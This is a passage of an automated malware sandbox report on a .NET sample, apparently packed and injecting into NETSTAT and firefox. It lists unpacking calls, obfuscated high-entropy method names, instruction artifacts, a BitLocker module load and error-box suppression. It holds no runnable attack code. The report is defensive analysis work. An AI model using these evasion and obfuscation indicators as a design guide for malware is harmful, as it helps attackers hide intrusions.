            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mCFHCvdrqdDiDT.exe, 0000000A.00000002.2578656019.000000000005E000.00000002.00000001.01000000.0000000C.sdmp, mCFHCvdrqdDiDT.exe, 0000000E.00000000.1887553135.000000000005E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: NU1aAbSmCr.exe, 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000003.1821240093.0000000003553000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000003.1823573799.000000000370C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: NU1aAbSmCr.exe, NU1aAbSmCr.exe, 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000000B.00000003.1821240093.0000000003553000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000003.1823573799.000000000370C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: tTOn.pdb source: NU1aAbSmCr.exe

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: NU1aAbSmCr.exe, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, aAZly5Crsqfj1ghU4r.cs.Net Code: kIl6PxJ2J5 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.NU1aAbSmCr.exe.2a6e8c4.1.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
            Source: 0.2.NU1aAbSmCr.exe.2ab4188.0.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
            Source: 0.2.NU1aAbSmCr.exe.2abd7a0.3.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, aAZly5Crsqfj1ghU4r.cs.Net Code: kIl6PxJ2J5 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.NU1aAbSmCr.exe.6e20000.5.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
            Source: 0.2.NU1aAbSmCr.exe.2a652ac.2.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
            Source: 11.2.NETSTAT.EXE.3eecd14.2.raw.unpack, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 14.2.mCFHCvdrqdDiDT.exe.257cd14.1.raw.unpack, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 14.0.mCFHCvdrqdDiDT.exe.257cd14.1.raw.unpack, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 15.2.firefox.exe.5eccd14.0.raw.unpack, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: NU1aAbSmCr.exeStatic PE information: 0xC29198FE [Sat Jun 10 12:03:10 2073 UTC]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 0_2_06ED0006 push es; retf 0_2_06ED001C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_00402095 push ss; iretd 4_2_004020A8
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_00414171 push FB06D95Fh; retf 4_2_0041417F
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0040B9BB pushfd ; iretd 4_2_0040B9C1
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0041922D push ebx; iretd 4_2_00419237
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0040229B pushad ; iretd 4_2_0040229C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0041EB21 push es; retf 4_2_0041EB2F
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0040AB94 push edi; ret 4_2_0040AB96
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_00403470 push eax; ret 4_2_00403472
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0041AC75 push 4C25DD1Ah; ret 4_2_0041AC7A
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_004124EA push eax; retf 4_2_00412512
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_004124F3 push eax; retf 4_2_00412512
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0040D572 push ss; ret 4_2_0040D577
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0040AD00 push ebp; iretd 4_2_0040AD01
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_00418694 push ds; retf 4_2_00418695
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_00406717 push esi; ret 4_2_0040671A
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015B225F pushad ; ret 4_2_015B27F9
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015B27FA pushad ; ret 4_2_015B27F9
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E09AD push ecx; mov dword ptr [esp], ecx4_2_015E09B6
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015B283D push eax; iretd 4_2_015B2858
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FA92E6 push ebp; iretd 10_2_02FA92E7
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FB0AD0 push eax; retf 10_2_02FB0AF8
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FB925B push 4C25DD1Ah; ret 10_2_02FB9260
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FA9382 push esp; iretd 10_2_02FA9383
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FABB58 push ss; ret 10_2_02FABB5D
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FB7813 push ebx; iretd 10_2_02FB781D
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FA917A push edi; ret 10_2_02FA917C
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FBD107 push es; retf 10_2_02FBD115
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FA9FA1 pushfd ; iretd 10_2_02FA9FA7
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FB2757 push FB06D95Fh; retf 10_2_02FB2765
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FA4CFD push esi; ret 10_2_02FA4D00
            Source: NU1aAbSmCr.exeStatic PE information: section name: .text entropy: 7.879696863228832
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, tQdy11d6ImjZgTeIqp.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'tcyvx7LDs1', 'ygOv7QJADU', 'oaAvzorxx6', 'qcE1j45nu0', 'FCb1bojcC8', 'xb81vVHfKB', 'N8l11rWAJn', 'QKQpqbjXruDqFYyVtwZ'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, IVbgTfTQ1POo67aCur.csHigh entropy of concatenated method names: 'fTqQAoGQiT', 'D1iQdFCFdF', 'VJDQGmdkwo', 'GamG7MUlLq', 'ikHGzGLb3y', 'IjOQjZNBCW', 'q9BQbbGY9n', 'jZlQvWB98n', 'koVQ1fXRNF', 'c8nQ6f1SsE'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, poGijHhIotUk5asnJA.csHigh entropy of concatenated method names: 'Dispose', 's6hbxr3l7U', 'MGJvN5hncE', 'lgAHHPrn9u', 'LTMb7lII1l', 'HdZbzaP37u', 'ProcessDialogKey', 'RJyvjSeEeq', 'QfYvbUrYvI', 'uwDvvFEFA2'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, eEFA2Q7p9QYJBbocTC.csHigh entropy of concatenated method names: 'g0W0bF1Fmq', 'jWM01boqK9', 'ylI06OiYfq', 'NUk0AxTmTD', 'n4L0hYX2ZD', 'hrf0llqpet', 'sBt0GkW6MB', 'qOEiwZpvQL', 'pTYie3KEn4', 'zrjixwtmAq'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, RuKXdbNqM3dp2oD6yS.csHigh entropy of concatenated method names: 'KJRYg1ve2yD7gPRcF2O', 'dUdVtWvfc3PMenZuxXI', 'wrkGiAlsi0', 'u7wG0u7Rri', 'YxHGtGgP7T', 'xN7FuGvxkKgaMhaMSjA', 'BMHLqJvpciMGXagmoPt', 'HsCRUyvP9yJU6aepABv'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, eBfLGP5uru6CY0dB1U.csHigh entropy of concatenated method names: 'ufgdRsWf9a', 'BnSdL3oqTu', 'pfMdWwoOWd', 'aQMd5LCyLN', 'M18dOYa6nl', 'ORZdMXISSi', 'TTDdEhmEbL', 'Kmpdi7je8d', 'QTmd0yKvf4', 'sh8dt7oOas'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, XWwa6bWsPleF4dvV8t.csHigh entropy of concatenated method names: 'bkxhK9LrwG', 'gQrh4Nt1lV', 'fIohZHbBDj', 'cOJhkHiBbC', 'Ifhhuo1A64', 'GVlhrYnann', 'tBihwiJMmv', 'uoHheYF2Yo', 'Ft6hx2MEDy', 'aDNh7AbYlj'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, LPAgiLrIFHs4ZRwD8d.csHigh entropy of concatenated method names: 'pAQEeCMw4N', 'd58E7IwaDn', 'cqpijbKojH', 'cR8ibj6rey', 'wMxEnEV1PD', 'EMHEHXZio3', 'DauEJKVSLU', 'yw6EKKqrR9', 'TdNE4C5jiL', 'dDTEZ0MhFp'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, ySeEeqxJfYUrYvIswD.csHigh entropy of concatenated method names: 'PHviX7MQdB', 'C4qiNt4JQQ', 'OeDiaS3rQi', 'oWFiS9PxML', 'btxiK5aKV6', 'YShigbY9yr', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, UJA3GRK8lGX2d9ulYH.csHigh entropy of concatenated method names: 'YJ0O9yocjL', 'iLUOHvb4hO', 'sCwOKb56g5', 'sKXO4SHSCS', 'ph8ON2p1Ai', 'aH0OahYBMW', 'ypCOSHpoUo', 'AGJOg6d8Z4', 'g4kOfi0ntq', 'IOgOT2wVF6'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, cowFnQbjOWIvD4misX2.csHigh entropy of concatenated method names: 'SD20mMhvEG', 'fD70yrM1MC', 'yfq0Pvb4F3', 'oOS0RoQlnh', 'Wp902v7lvd', 'Cn30L1iCuE', 'MLa0oApMVG', 'tyn0WOfOCd', 't2m05SD2M4', 'VCv0IH4oCk'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, aAZly5Crsqfj1ghU4r.csHigh entropy of concatenated method names: 'Gsu1FXOZt8', 'Dx91AM9aA3', 'ShI1hIBfqr', 'rHH1dwUKaA', 'CAK1lcEsLh', 'oKL1G4IU2N', 'PDU1Qe2fAy', 'oCD1CKPOGW', 'vIJ1YTxhOV', 'obR1D2sAcA'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, vimOCXIBCjJPTdQTW9.csHigh entropy of concatenated method names: 'PsFl2RGWll', 'IsploSHt76', 'i1Zda2fag1', 'KmOdSN9M99', 'Nncdgp89wc', 'yOKdfEu8Gu', 'C4HdTkcafj', 'VTLd8rP29g', 'L0IdchnI1t', 'vU0d9bjn01'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, KMlII1eladZaP37uKJ.csHigh entropy of concatenated method names: 'VEpiA1jkJJ', 'r7jihUsJg5', 'BCBidW1VUV', 'FDSilTALAr', 'qUQiGU3dv9', 'SThiQYoFr5', 'xbYiCfE0Uu', 'FRuiYh76eY', 'xtsiDranEx', 'fqmiUEo5Co'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, dEy136JlvLIeHAG4Vr.csHigh entropy of concatenated method names: 'q4QqWJtOA2', 'FQtq5abB2e', 'xwNqXBvurJ', 'PQGqNTkvkZ', 'Wa2qS4uyaS', 'elwqg2gmTg', 'GCEqTsNcr0', 'AN1q8jQ8H4', 'sbnq9NxRN9', 'BFfqn4T5Gn'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, KAqfjpc2gGlfOCpH2c.csHigh entropy of concatenated method names: 'tH2QmZP68p', 'ODrQygOJpn', 'z6jQP6Tb4w', 'GsoQR9uJVs', 'cpkQ2yuPRV', 'ROKQLYK7L7', 'PttQo7H6Y7', 'v6JQWyXGwm', 'PjOQ5KC338', 'NHQQIIkD0O'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, AZQ9PHv32R6FkTCKsI.csHigh entropy of concatenated method names: 'yxiPPifbu', 'XWxRljALV', 'tnQLYdgOG', 'twioBhgGQ', 'gjX5MnAvy', 'h7tI6gQ3p', 'zFZ6TXIQZZSZV1in11', 'Xdcp3wNXkCeDOFPiQK', 'w9miqciIe', 'WJstmBV3O'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, kc688j6nmmtYoQgfN7.csHigh entropy of concatenated method names: 'xaebQWwa6b', 'uPlbCeF4dv', 'zurbDu6CY0', 'hB1bUU3imO', 'gQTbOW9DvP', 'xbZbMIdhfY', 'lGpTyenY6tRpEcKYy3', 'uqQ8I8HSnSgdfNkkOV', 'QArbbGEWV6', 'vf5b1ZjqbB'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, ywRNQ9kpJpmw0oOgQg.csHigh entropy of concatenated method names: 'jGnEDJA6dH', 'IX4EUWsXJf', 'ToString', 'n9SEANfeYK', 'UTtEhPXQJg', 'LxbEd8jrmq', 'cx0ElrMROx', 'l0xEGFj1jU', 'iQnEQHw247', 'lviECyyuV7'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, H64pdQb1gX4rea6PeLc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QZKtKR2WHh', 'dept4Q1cYE', 'ARftZGplkh', 'EVttkPE8Ku', 'UNXtu82rl2', 'NSTtrTWFsE', 'UeKtwSoyp6'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, CvS56KZhYxBb5epEhU.csHigh entropy of concatenated method names: 'ToString', 'JP7Mnyl0DO', 'I6JMNJCTUI', 'hFDMapuBTD', 'KVDMSlPM5D', 'zilMgC3ON6', 'a16MfnpnZH', 'bYeMTVqAeC', 'QPkM8RX7WB', 'fcfMc5ZiWd'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, lvPpbZXIdhfYh5i4EU.csHigh entropy of concatenated method names: 'mm0GFt3LIj', 'TwtGhuhONn', 'yBcGlQVTuc', 'V6eGQrpt3m', 'RR4GCqr4hb', 'Smlluavpuu', 'BSMlrrgbGy', 'bv9lwh5u8W', 'UlPleu8yMj', 'q4ZlxCJsGN'
            Source: 0.2.NU1aAbSmCr.exe.2a6e8c4.1.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
            Source: 0.2.NU1aAbSmCr.exe.2ab4188.0.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
            Source: 0.2.NU1aAbSmCr.exe.2abd7a0.3.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, tQdy11d6ImjZgTeIqp.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'tcyvx7LDs1', 'ygOv7QJADU', 'oaAvzorxx6', 'qcE1j45nu0', 'FCb1bojcC8', 'xb81vVHfKB', 'N8l11rWAJn', 'QKQpqbjXruDqFYyVtwZ'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, IVbgTfTQ1POo67aCur.csHigh entropy of concatenated method names: 'fTqQAoGQiT', 'D1iQdFCFdF', 'VJDQGmdkwo', 'GamG7MUlLq', 'ikHGzGLb3y', 'IjOQjZNBCW', 'q9BQbbGY9n', 'jZlQvWB98n', 'koVQ1fXRNF', 'c8nQ6f1SsE'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, poGijHhIotUk5asnJA.csHigh entropy of concatenated method names: 'Dispose', 's6hbxr3l7U', 'MGJvN5hncE', 'lgAHHPrn9u', 'LTMb7lII1l', 'HdZbzaP37u', 'ProcessDialogKey', 'RJyvjSeEeq', 'QfYvbUrYvI', 'uwDvvFEFA2'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, eEFA2Q7p9QYJBbocTC.csHigh entropy of concatenated method names: 'g0W0bF1Fmq', 'jWM01boqK9', 'ylI06OiYfq', 'NUk0AxTmTD', 'n4L0hYX2ZD', 'hrf0llqpet', 'sBt0GkW6MB', 'qOEiwZpvQL', 'pTYie3KEn4', 'zrjixwtmAq'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, RuKXdbNqM3dp2oD6yS.csHigh entropy of concatenated method names: 'KJRYg1ve2yD7gPRcF2O', 'dUdVtWvfc3PMenZuxXI', 'wrkGiAlsi0', 'u7wG0u7Rri', 'YxHGtGgP7T', 'xN7FuGvxkKgaMhaMSjA', 'BMHLqJvpciMGXagmoPt', 'HsCRUyvP9yJU6aepABv'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, eBfLGP5uru6CY0dB1U.csHigh entropy of concatenated method names: 'ufgdRsWf9a', 'BnSdL3oqTu', 'pfMdWwoOWd', 'aQMd5LCyLN', 'M18dOYa6nl', 'ORZdMXISSi', 'TTDdEhmEbL', 'Kmpdi7je8d', 'QTmd0yKvf4', 'sh8dt7oOas'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, XWwa6bWsPleF4dvV8t.csHigh entropy of concatenated method names: 'bkxhK9LrwG', 'gQrh4Nt1lV', 'fIohZHbBDj', 'cOJhkHiBbC', 'Ifhhuo1A64', 'GVlhrYnann', 'tBihwiJMmv', 'uoHheYF2Yo', 'Ft6hx2MEDy', 'aDNh7AbYlj'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, LPAgiLrIFHs4ZRwD8d.csHigh entropy of concatenated method names: 'pAQEeCMw4N', 'd58E7IwaDn', 'cqpijbKojH', 'cR8ibj6rey', 'wMxEnEV1PD', 'EMHEHXZio3', 'DauEJKVSLU', 'yw6EKKqrR9', 'TdNE4C5jiL', 'dDTEZ0MhFp'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, ySeEeqxJfYUrYvIswD.csHigh entropy of concatenated method names: 'PHviX7MQdB', 'C4qiNt4JQQ', 'OeDiaS3rQi', 'oWFiS9PxML', 'btxiK5aKV6', 'YShigbY9yr', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, UJA3GRK8lGX2d9ulYH.csHigh entropy of concatenated method names: 'YJ0O9yocjL', 'iLUOHvb4hO', 'sCwOKb56g5', 'sKXO4SHSCS', 'ph8ON2p1Ai', 'aH0OahYBMW', 'ypCOSHpoUo', 'AGJOg6d8Z4', 'g4kOfi0ntq', 'IOgOT2wVF6'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, cowFnQbjOWIvD4misX2.csHigh entropy of concatenated method names: 'SD20mMhvEG', 'fD70yrM1MC', 'yfq0Pvb4F3', 'oOS0RoQlnh', 'Wp902v7lvd', 'Cn30L1iCuE', 'MLa0oApMVG', 'tyn0WOfOCd', 't2m05SD2M4', 'VCv0IH4oCk'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, aAZly5Crsqfj1ghU4r.csHigh entropy of concatenated method names: 'Gsu1FXOZt8', 'Dx91AM9aA3', 'ShI1hIBfqr', 'rHH1dwUKaA', 'CAK1lcEsLh', 'oKL1G4IU2N', 'PDU1Qe2fAy', 'oCD1CKPOGW', 'vIJ1YTxhOV', 'obR1D2sAcA'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, vimOCXIBCjJPTdQTW9.csHigh entropy of concatenated method names: 'PsFl2RGWll', 'IsploSHt76', 'i1Zda2fag1', 'KmOdSN9M99', 'Nncdgp89wc', 'yOKdfEu8Gu', 'C4HdTkcafj', 'VTLd8rP29g', 'L0IdchnI1t', 'vU0d9bjn01'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, KMlII1eladZaP37uKJ.csHigh entropy of concatenated method names: 'VEpiA1jkJJ', 'r7jihUsJg5', 'BCBidW1VUV', 'FDSilTALAr', 'qUQiGU3dv9', 'SThiQYoFr5', 'xbYiCfE0Uu', 'FRuiYh76eY', 'xtsiDranEx', 'fqmiUEo5Co'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, dEy136JlvLIeHAG4Vr.csHigh entropy of concatenated method names: 'q4QqWJtOA2', 'FQtq5abB2e', 'xwNqXBvurJ', 'PQGqNTkvkZ', 'Wa2qS4uyaS', 'elwqg2gmTg', 'GCEqTsNcr0', 'AN1q8jQ8H4', 'sbnq9NxRN9', 'BFfqn4T5Gn'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, KAqfjpc2gGlfOCpH2c.csHigh entropy of concatenated method names: 'tH2QmZP68p', 'ODrQygOJpn', 'z6jQP6Tb4w', 'GsoQR9uJVs', 'cpkQ2yuPRV', 'ROKQLYK7L7', 'PttQo7H6Y7', 'v6JQWyXGwm', 'PjOQ5KC338', 'NHQQIIkD0O'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, AZQ9PHv32R6FkTCKsI.csHigh entropy of concatenated method names: 'yxiPPifbu', 'XWxRljALV', 'tnQLYdgOG', 'twioBhgGQ', 'gjX5MnAvy', 'h7tI6gQ3p', 'zFZ6TXIQZZSZV1in11', 'Xdcp3wNXkCeDOFPiQK', 'w9miqciIe', 'WJstmBV3O'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, kc688j6nmmtYoQgfN7.csHigh entropy of concatenated method names: 'xaebQWwa6b', 'uPlbCeF4dv', 'zurbDu6CY0', 'hB1bUU3imO', 'gQTbOW9DvP', 'xbZbMIdhfY', 'lGpTyenY6tRpEcKYy3', 'uqQ8I8HSnSgdfNkkOV', 'QArbbGEWV6', 'vf5b1ZjqbB'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, ywRNQ9kpJpmw0oOgQg.csHigh entropy of concatenated method names: 'jGnEDJA6dH', 'IX4EUWsXJf', 'ToString', 'n9SEANfeYK', 'UTtEhPXQJg', 'LxbEd8jrmq', 'cx0ElrMROx', 'l0xEGFj1jU', 'iQnEQHw247', 'lviECyyuV7'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, H64pdQb1gX4rea6PeLc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QZKtKR2WHh', 'dept4Q1cYE', 'ARftZGplkh', 'EVttkPE8Ku', 'UNXtu82rl2', 'NSTtrTWFsE', 'UeKtwSoyp6'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, CvS56KZhYxBb5epEhU.csHigh entropy of concatenated method names: 'ToString', 'JP7Mnyl0DO', 'I6JMNJCTUI', 'hFDMapuBTD', 'KVDMSlPM5D', 'zilMgC3ON6', 'a16MfnpnZH', 'bYeMTVqAeC', 'QPkM8RX7WB', 'fcfMc5ZiWd'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, lvPpbZXIdhfYh5i4EU.csHigh entropy of concatenated method names: 'mm0GFt3LIj', 'TwtGhuhONn', 'yBcGlQVTuc', 'V6eGQrpt3m', 'RR4GCqr4hb', 'Smlluavpuu', 'BSMlrrgbGy', 'bv9lwh5u8W', 'UlPleu8yMj', 'q4ZlxCJsGN'
            Source: 0.2.NU1aAbSmCr.exe.6e20000.5.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
            Source: 0.2.NU1aAbSmCr.exe.2a652ac.2.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
